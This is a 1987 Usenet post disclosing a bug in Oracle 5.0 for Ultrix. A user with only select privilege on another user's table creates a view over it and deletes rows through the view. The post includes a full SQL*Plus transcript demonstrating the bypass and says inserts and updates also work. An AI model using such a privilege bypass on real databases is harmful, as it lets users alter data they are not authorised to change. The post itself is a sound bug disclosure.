Relay-Version: version B 2.10 5/3/83; site utzoo.UUCP
Path: utzoo!mnetor!uunet!ccicpg!felix!zemon
From: zemon@felix.UUCP (Art Zemon)
Newsgroups: comp.databases
Subject: bug in Oracle 5.0 for Ultrix
Message-ID: <14974@felix.UUCP>
Date: Wed, 2-Dec-87 16:21:40 EST
Article-I.D.: felix.14974
Posted: Wed Dec  2 16:21:40 1987
Date-Received: Mon, 7-Dec-87 04:07:35 EST
Sender: daemon@felix.UUCP
Reply-To: zemon@felix.UUCP (Art Zemon)
Organization: FileNet Corp., Costa Mesa, CA
Lines: 103
Keywords: views violate security


You can gain free access to a table which you only have
select privileges for by creating a view.  Try this:

    Script started on Wed Dec  2 13:13:24 1987
    fritz {21} sqlplus

    SQL*Plus: Version 1.0.11 - Production on Wed Dec  2 13:13:29 1987

    Copyright (c) 1986, Oracle Corporation, California, USA.  All rights reserved.

    Enter user-name: ops$zemon
    Enter password: 
    Connected to: ORACLE V5.0.20 .4 - Production


    SQL> create table t (n number);

    Table created.

    SQL> insert into t values (1);

    1 record created.

    SQL> insert into t values (2);

    1 record created.

    SQL> select * from t;

	N
    -----
	1
	2

    SQL> grant select on t to public;

    Grant succeeded.

    SQL> connect ops$otheruser
    Enter password: Connected.

    SQL> select * from ops$zemon.t;

	N
    -----
	1
	2

    SQL> delete from ops$zemon.t where n = 2;
    delete from ops$zemon.t where n = 2
			  *
    ERROR at line 1: ORA-1031:  insufficient privileges

    SQL> create view v as select * from ops$zemon.t;

    View created.

    SQL> select * from v;

	N
    -----
	1
	2

    SQL> delete from v where n = 2;

    1 record deleted.

    SQL> select * from v;

	N
    -----
	1

    SQL> select * from ops$zemon.t;

	N
    -----
	1

    SQL> connect ops$zemon
    Enter password: Connected.

    SQL> select * from t;

	N
    -----
	1

    SQL> exit
    Disconnected from ORACLE

    fritz {22} exit
    script done on Wed Dec  2 13:16:47 1987

You can also insert rows through view v and update existing
data.  The bug is supposed to be fixed in 5.1.
--
	-- Art Zemon
	   By Computer:	    ...!hplabs!felix!zemon
	   By Air:	    Archer N33565
	   By Golly:	    moderator of comp.unix.ultrix